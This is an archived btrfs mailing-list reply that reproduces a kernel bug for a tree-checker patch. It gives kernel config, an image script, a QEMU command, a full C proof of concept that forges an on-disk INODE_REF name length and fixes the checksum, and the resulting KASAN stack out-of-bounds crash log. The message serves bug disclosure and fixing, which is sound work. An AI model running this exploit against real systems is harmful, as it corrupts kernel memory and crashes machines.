Linux Btrfs filesystem development
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: linux-btrfs@vger.kernel.org
Cc: dsterba@suse.com, josef@toxicpanda.com, clm@fb.com, xmei5@asu.edu
Subject: Re: [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths
Date: Wed, 10 Jun 2026 18:45:06 +0800	[thread overview]
Message-ID: <aik0hEV6ehKx6Ldv@Air.local> (raw)
In-Reply-To: <20260608083509.3907960-2-bestswngs@gmail.com>

Reproduction:


Required kernel configuration:
```
CONFIG_BTRFS_FS=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_KASAN_STACK=y
CONFIG_STACKPROTECTOR_STRONG=y
```

Steps to reproduce:

1. Create a btrfs filesystem
```
#!/bin/sh
# Create a fresh btrfs image file.
# Usage: <script> [OUT [SIZE]]   (defaults: base.img, 512M)
set -e

OUT="${1:-base.img}"
SIZE="${2:-512M}"

# Always start from a new file of the requested size.
rm -f "$OUT"
truncate -s "$SIZE" "$OUT"

# mkfs output is discarded; only the summary line below is printed.
mkfs.btrfs -f "$OUT" >/dev/null
echo "wrote clean btrfs image: $OUT ($SIZE)"
```

2. Run QEMU with the image
```
# Boot the KASAN test kernel with the image attached as a virtio drive.
# kasan.fault=panic is passed on the kernel command line, so the KASAN report
# ends in a kernel panic (see the log in step 4).
# NOTE: this expects the image at /tmp/base.img, while the image script in
# step 1 writes base.img in the current directory unless given a path.
qemu-system-x86_64 -enable-kvm -cpu host -m 4G -smp 2 -nographic -no-reboot \
    -kernel kernel/test-bzImage-kasan \
    -initrd env/initramfs-selfcontained.cpio.gz \
    -drive file=/tmp/base.img,if=virtio,format=raw,snapshot=on \
    -append "console=ttyS0 rdinit=/init nokaslr kasan.fault=panic"
```


3. Run the PoC

```c
// Build:  gcc -O2 -static -o poc poc_selfcontained.c
// Run  :  attach a freshly `mkfs.btrfs`-ed image as DEV (default /dev/vda)

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/mman.h>

// Device that is mounted and then patched; the #ifndef lets a build override
// it with -DDEV=... .
#ifndef DEV
#define DEV "/dev/vda"
#endif
// Mount point used for both mounts in main().
#define MNT "/mnt"

// Sizes of the structures that patch_device() walks by raw byte offset.
#define HDR             0x65    // sizeof(struct btrfs_header)
#define ITEM            25      // sizeof(struct btrfs_item)
#define IREF            10      // sizeof(struct btrfs_inode_ref): u64 index + u16 name_len
// Stride of the device scan in patch_device(): every SECTOR-aligned offset is
// tested as a possible tree block start.
#define SECTOR          4096
#define KEY_INODE_REF   12      // BTRFS_INODE_REF_KEY
// Forged name_len written into the INODE_REF item; the item itself is grown
// to IREF + TARGET_NAME_LEN bytes so that the item size still matches.
#define TARGET_NAME_LEN 4096

// CRC-32C over the n bytes at p, computed one bit at a time with the
// reflected polynomial 0x82F63B78. The register starts at all-ones and the
// final value is inverted before it is returned.
static uint32_t crc32c(const uint8_t *p, size_t n)
{
	const uint32_t poly = 0x82F63B78u;
	uint32_t acc = 0xFFFFFFFFu;

	for (size_t pos = 0; pos != n; ++pos) {
		acc ^= p[pos];
		for (int bit = 8; bit > 0; --bit) {
			// Shift out the low bit; fold in the polynomial when it was set.
			if (acc & 1u)
				acc = (acc >> 1) ^ poly;
			else
				acc >>= 1;
		}
	}
	return acc ^ 0xFFFFFFFFu;
}
// Read an unaligned 64-bit little-endian value from p. The bytes are combined
// explicitly, so the result does not depend on the host byte order (the
// values read here are on-disk btrfs fields, which are little-endian).
static uint64_t rd64(const uint8_t *p)
{
	uint64_t v = 0;
	for (int i = 7; i >= 0; i--)
		v = (v << 8) | p[i];
	return v;
}
// Read an unaligned 32-bit little-endian value from p. The bytes are combined
// explicitly, so the result does not depend on the host byte order (the
// values read here are on-disk btrfs fields, which are little-endian).
static uint32_t rd32(const uint8_t *p)
{
	uint32_t v = 0;
	for (int i = 3; i >= 0; i--)
		v = (v << 8) | p[i];
	return v;
}
// Store v at p as an unaligned 32-bit little-endian value. The bytes are
// written one by one, so the stored layout does not depend on the host byte
// order (the destinations are on-disk btrfs fields, which are little-endian).
static void wr32(uint8_t *p, uint32_t v)
{
	for (int i = 0; i < 4; i++)
		p[i] = (uint8_t)(v >> (8 * i));
}
// Store v at p as an unaligned 16-bit little-endian value. The bytes are
// written one by one, so the stored layout does not depend on the host byte
// order (the destination is an on-disk btrfs field, which is little-endian).
static void wr16(uint8_t *p, uint16_t v)
{
	p[0] = (uint8_t)(v & 0xFFu);
	p[1] = (uint8_t)(v >> 8);
}

// Storage for the file handle of /sub/d: main() passes &fh.h to
// name_to_handle_at() and open_by_handle_at(), and sets h.handle_bytes to
// sizeof buf so the kernel knows how much room follows the header.
// NOTE(review): this relies on buf being laid out directly after h so the
// handle bytes land in it; embedding a struct that ends in a flexible array
// is presumably accepted only as a compiler extension -- confirm if porting.
struct fh { struct file_handle h; unsigned char buf[64]; };

// Rewrite d's INODE_REF item on the raw device (every DUP copy of the leaf).
//
// The whole device is mapped read/write. fsid and nodesize are taken from the
// superblock at 64K, then every SECTOR-aligned offset is tested as a possible
// level-0 tree block of this filesystem. In each such leaf the item with key
// (d_ino, KEY_INODE_REF, sub_ino) and size IREF + 1 is grown in place to
// IREF + TARGET_NAME_LEN bytes, its name_len is set to TARGET_NAME_LEN, and
// the leaf checksum is recomputed so the block still verifies.
//
//   dev      path of the device/image to patch (must not be mounted)
//   d_ino    inode number of the child directory (key objectid)
//   sub_ino  inode number of its parent directory (key offset)
//
// Returns the number of leaves patched (possibly 0), or -1 on any error
// (open/lseek/mmap/msync failure, device too small, bad magic or nodesize).
// The mapping and the descriptor are released on every path.
static int patch_device(const char *dev, uint64_t d_ino, uint64_t sub_ino)
{
	enum { SB_OFFSET = 0x10000 };             // superblock lives at 64K
	uint8_t *m = MAP_FAILED;
	off_t sz = 0;
	int patched = 0;
	int rc = -1;

	int fd = open(dev, O_RDWR);
	if (fd < 0) { perror("open dev"); return -1; }

	sz = lseek(fd, 0, SEEK_END);
	if (sz < 0) { perror("lseek"); goto out; }
	if (sz < (off_t)SB_OFFSET + SECTOR) {
		// Without this the superblock reads below would run off the mapping.
		fprintf(stderr, "device too small for a btrfs superblock\n");
		goto out;
	}

	m = mmap(NULL, (size_t)sz, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if (m == MAP_FAILED) { perror("mmap"); goto out; }

	// superblock @ 64K: magic@+0x40, fsid@+0x20, nodesize@+0x94
	const uint8_t *sb = m + SB_OFFSET;
	if (memcmp(sb + 0x40, "_BHRfS_M", 8)) { fprintf(stderr,"bad btrfs magic\n"); goto out; }
	uint8_t fsid[16]; memcpy(fsid, sb + 0x20, 16);
	uint32_t nodesize = rd32(sb + 0x94);
	if (nodesize <= HDR) {
		// A tree block must at least hold its header; also keeps the
		// subtractions below from wrapping.
		fprintf(stderr, "bad nodesize %u\n", (unsigned)nodesize);
		goto out;
	}

	// Item data offsets are relative to the end of the header, so the data
	// area is nodesize - HDR bytes and the item table can never hold more
	// than leaf_data / ITEM entries.
	const uint32_t leaf_data = nodesize - HDR;
	const uint32_t max_items = leaf_data / ITEM;

	for (off_t off = 0; off + (off_t)nodesize <= sz; off += SECTOR) {
		if (memcmp(m + off + 0x20, fsid, 16)) continue;   // same filesystem
		if (m[off + 0x64] != 0) continue;                 // leaf (level 0)
		uint32_t nritems = rd32(m + off + 0x60);
		if (!nritems || nritems > max_items) continue;    // table must fit in the block

		for (uint32_t i = 0; i < nritems; i++) {
			off_t ip = off + HDR + (off_t)i * ITEM;
			if (rd64(m+ip) != d_ino || m[ip+8] != KEY_INODE_REF ||
			    rd64(m+ip+9) != sub_ino)
				continue;
			uint32_t ioff = rd32(m+ip+17), isize = rd32(m+ip+21);
			if (isize != IREF + 1) continue;              // expect the "d" entry (len 1)
			// the item's data must lie inside this block's data area
			if (ioff > leaf_data || isize > leaf_data - ioff) continue;

			uint32_t new_size = IREF + TARGET_NAME_LEN;   // 4106
			uint32_t delta    = new_size - isize;         // 4095

			// start of the packed data region = lowest item data offset
			uint32_t data_end = leaf_data;
			for (uint32_t j = 0; j < nritems; j++) {
				uint32_t o = rd32(m+off+HDR+(off_t)j*ITEM+17);
				if (o < data_end) data_end = o;
			}
			// free space = gap between the item table and the packed data;
			// test data_end first so the subtraction cannot wrap
			uint32_t table = ITEM * nritems;
			if (data_end < table || delta > data_end - table) {
				fprintf(stderr,"no room\n");
				continue;
			}

			// grow item i: shift the data of items at offset <= ioff down by delta
			// (data_end <= ioff here, so the length below is non-negative)
			uint8_t *base = m + off + HDR;
			memmove(base + data_end - delta, base + data_end,
				(ioff + isize) - data_end);
			for (uint32_t j = 0; j < nritems; j++) {
				off_t jp = off + HDR + (off_t)j * ITEM;
				uint32_t o = rd32(m+jp+17);
				if (o <= ioff) wr32(m+jp+17, o - delta);
			}
			wr32(m + ip + 21, new_size);                  // item size 11 -> 4106
			wr16(base + (ioff - delta) + 8, TARGET_NAME_LEN); // name_len 1 -> 4096

			wr32(m + off, crc32c(m + off + 0x20, nodesize - 0x20)); // leaf csum
			patched++;
			break;            // one matching item per leaf; keep scanning for DUP copies
		}
	}

	// The caller mounts the device right after this, so a failed flush must
	// be reported instead of silently leaving the old leaf on disk.
	if (msync(m, (size_t)sz, MS_SYNC)) { perror("msync"); goto out; }
	rc = patched;
out:
	if (m != MAP_FAILED)
		munmap(m, (size_t)sz);
	close(fd);
	return rc;
}

// PoC driver:
//   1. mount DEV, create /sub/d and record both inode numbers,
//   2. obtain a file handle for /sub/d, sync and unmount,
//   3. patch d's INODE_REF on the raw device (name_len 1 -> TARGET_NAME_LEN),
//   4. mount again and open the saved handle, which makes the kernel look up
//      d's name through the forged INODE_REF.
// Returns 0 when the final open_by_handle_at() call returned (whether it
// failed or succeeded) and 1 when any set-up step failed.
int main(void)
{
	struct fh fh; int mid; struct stat st;
	uint64_t d_ino, sub_ino;

	mkdir(MNT, 0755);                         // may already exist; mount reports real problems
	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #1"); return 1; }

	mkdir(MNT "/sub", 0755);                  // failure surfaces in the next mkdir
	if (mkdir(MNT "/sub/d", 0755)) { perror("mkdir /sub/d"); return 1; }

	// The inode numbers are the search key for patch_device(); an unchecked
	// stat() failure would leave them holding garbage.
	if (stat(MNT "/sub", &st)) { perror("stat /sub"); return 1; }
	sub_ino = st.st_ino;
	if (stat(MNT "/sub/d", &st)) { perror("stat /sub/d"); return 1; }
	d_ino = st.st_ino;
	printf("[poc] created /sub/d  (sub_ino=%lu d_ino=%lu)\n",
	       (unsigned long)sub_ino, (unsigned long)d_ino);

	fh.h.handle_bytes = sizeof fh.buf;
	if (name_to_handle_at(AT_FDCWD, MNT "/sub/d", &fh.h, &mid, 0)) {
		perror("name_to_handle_at"); return 1;
	}
	printf("[poc] obtained file handle for /sub/d (%u bytes)\n", fh.h.handle_bytes);
	sync();
	// The raw device must not be rewritten while the filesystem is still mounted.
	if (umount(MNT)) { perror("umount"); return 1; }

	int n = patch_device(DEV, d_ino, sub_ino);
	printf("[poc] rewrote %d on-disk INODE_REF copy/ies: name_len 1 -> %d, "
	       "item 11 -> %d bytes\n", n, TARGET_NAME_LEN, IREF + TARGET_NAME_LEN);
	if (n < 1) { fprintf(stderr, "[poc] nothing patched\n"); return 1; }

	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #2"); return 1; }
	int mfd = open(MNT, O_RDONLY | O_DIRECTORY);
	if (mfd < 0) { perror("open mnt"); return 1; }

	puts("[poc] open_by_handle_at(/sub/d) -> reconnect_path -> btrfs_get_name "
	     "(expect stack-OOB on a vulnerable kernel)");
	int r = open_by_handle_at(mfd, &fh.h, O_RDONLY | O_DIRECTORY);
	if (r < 0)
		printf("[poc] open_by_handle_at: %s  -- no crash, kernel is PATCHED\n",
		       strerror(errno));
	else
		puts("[poc] open_by_handle_at succeeded (unexpected)");
	return 0;
}

```


4. Observe the crash

```
[   23.447577][  T178] BUG: KASAN: stack-out-of-bounds in read_extent_buffer+0x2b4/0x3c0
k-OOB on a vulne[   23.447983][  T178] Write of size 633 at addr ffff88810a67fbc0 by task poc/178
rable kernel)
[   23.448358][  T178]
[   23.448523][  T178] CPU: 1 UID: 0 PID: 178 Comm: poc Tainted: G        W           7.1.0-rc2+ #166 PREEMPT(lazy)  94e7405e6ff72f9547adbe151fef187ff71238a
[   23.448527][  T178] Tainted: [W]=WARN
[   23.448527][  T178] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   23.448529][  T178] Call Trace:
[   23.448530][  T178]  <TASK>
[   23.448531][  T178]  dump_stack_lvl+0x93/0x100
[   23.448535][  T178]  print_address_description.constprop.0+0x30/0x400
[   23.448537][  T178]  ? __virt_addr_valid+0x228/0x440
[   23.448540][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448542][  T178]  print_report+0xc4/0x2c0
[   23.448544][  T178]  ? __virt_addr_valid+0x237/0x440
[   23.448546][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448548][  T178]  kasan_report+0xf8/0x140
[   23.448550][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448553][  T178]  kasan_check_range+0x119/0x200
[   23.448555][  T178]  __asan_memcpy+0x3c/0x80
[   23.448558][  T178]  read_extent_buffer+0x2b4/0x3c0
[   23.448561][  T178]  btrfs_get_name+0x333/0x600
[   23.448564][  T178]  ? __pfx_btrfs_get_name+0x40/0x40
[   23.448566][  T178]  ? __lock_acquire+0x4f9/0xc00
[   23.448570][  T178]  reconnect_one+0x17e/0x580
[   23.448572][  T178]  ? __pfx_reconnect_one+0x40/0x40
[   23.448574][  T178]  ? trace_preempt_enable+0xac/0x180
[   23.448576][  T178]  ? _raw_spin_unlock+0x2d/0x80
[   23.448578][  T178]  ? trace_preempt_on+0x2c/0x40
[   23.448581][  T178]  reconnect_path+0x20c/0x2c0
[   23.448583][  T178]  ? __pfx_vfs_dentry_acceptable+0x40/0x40
[   23.448586][  T178]  exportfs_decode_fh_raw+0x5a3/0x880
[   23.448588][  T178]  ? __pfx_exportfs_decode_fh_raw+0x40/0x40
[   23.448594][  T178]  ? __might_fault+0xad/0x140
[   23.448596][  T178]  ? __lock_release.isra.0+0x5d/0x180
[   23.448598][  T178]  ? __might_fault+0xad/0x140
[   23.448601][  T178]  handle_to_path+0x524/0x880
[   23.448603][  T178]  ? __pfx_handle_to_path+0x40/0x40
[   23.448606][  T178]  ? entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   23.448608][  T178]  ? lockdep_hardirqs_on+0x7f/0x140
[   23.448611][  T178]  ? do_handle_open+0x7e/0x200
[   23.448613][  T178]  do_handle_open+0x7e/0x200
[   23.448615][  T178]  ? __pfx_do_handle_open+0x40/0x40
[   23.448617][  T178]  ? rcu_is_watching+0x15/0xc0
[   23.448619][  T178]  ? do_syscall_64+0x129/0xf00
[   23.448621][  T178]  ? trace_preempt_enable+0xac/0x180
[   23.448623][  T178]  do_syscall_64+0x17a/0xf00
[   23.448625][  T178]  ? do_syscall_64+0x129/0xf00
[   23.448626][  T178]  ? clear_bhb_loop+0x60/0xc0
[   23.448628][  T178]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   23.448630][  T178] RIP: 0033:0x41bf74
[   23.448632][  T178] Code: 89 02 48 c7 c0 ff ff ff ff eb b4 e8 e6 08 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 80 3d ed 80 09 00 00 74 13 b8 30 01 00 00 0f 05 5
[   23.448634][  T178] RSP: 002b:00007fffce51fac8 EFLAGS: 00000202 ORIG_RAX: 0000000000000130
[   23.448636][  T178] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000000000041bf74
[   23.448638][  T178] RDX: 0000000000010000 RSI: 00007fffce51fb30 RDI: 0000000000000003
[   23.448639][  T178] RBP: 0000000000000003 R08: 0000000000000000 R09: 0000000000000000
[   23.448640][  T178] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000102
[   23.448641][  T178] R13: 0000000000000003 R14: 00007fffce51fb30 R15: 00007fffce51fc10
[   23.448644][  T178]  </TASK>
[   23.448645][  T178]
[   23.462123][  T178] The buggy address belongs to stack of task poc/178
[   23.462403][  T178]  and is located at offset 64 in frame:
[   23.462639][  T178]  exportfs_decode_fh_raw+0x0/0x880
[   23.462860][  T178]
[   23.462961][  T178] This frame has 2 objects:
[   23.463159][  T178]  [32, 48) 'path'
[   23.463161][  T178]  [64, 320) 'nbuf'
[   23.463320][  T178]
[   23.463582][  T178] The buggy address belongs to the physical page:
[   23.463852][  T178] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a67f
[   23.464228][  T178] flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff)
[   23.464540][  T178] raw: 0017ffffc0000000 ffffea0004299fc8 ffffea0004299fc8 0000000000000000
[   23.464899][  T178] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
[   23.465263][  T178] page dumped because: kasan: bad access detected
[   23.465532][  T178]
[   23.465633][  T178] Memory state around the buggy address:
[   23.465869][  T178]  ffff88810a67fb80: f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 00 00 00 00
[   23.466212][  T178]  ffff88810a67fc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   23.466549][  T178] >ffff88810a67fc80: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3
[   23.466886][  T178]                                            ^
[   23.467152][  T178]  ffff88810a67fd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   23.467489][  T178]  ffff88810a67fd80: f1 f1 f1 f1 00 00 00 f2 f2 f2 f2 f2 00 f3 f3 f3
[   23.467826][  T178] ==================================================================
[   23.468184][  T178] Kernel panic - not syncing: kasan.fault=panic set ...
```

  parent reply	other threads:[~2026-06-10 10:45 UTC|newest]

Thread overview: 4+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-08  8:35 [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths Weiming Shi
2026-06-08  9:19 ` Qu Wenruo
2026-06-10 10:45 ` Weiming Shi [this message]
2026-06-10 11:26   ` Qu Wenruo

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=aik0hEV6ehKx6Ldv@Air.local \
    --to=bestswngs@gmail.com \
    --cc=clm@fb.com \
    --cc=dsterba@suse.com \
    --cc=josef@toxicpanda.com \
    --cc=linux-btrfs@vger.kernel.org \
    --cc=xmei5@asu.edu \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox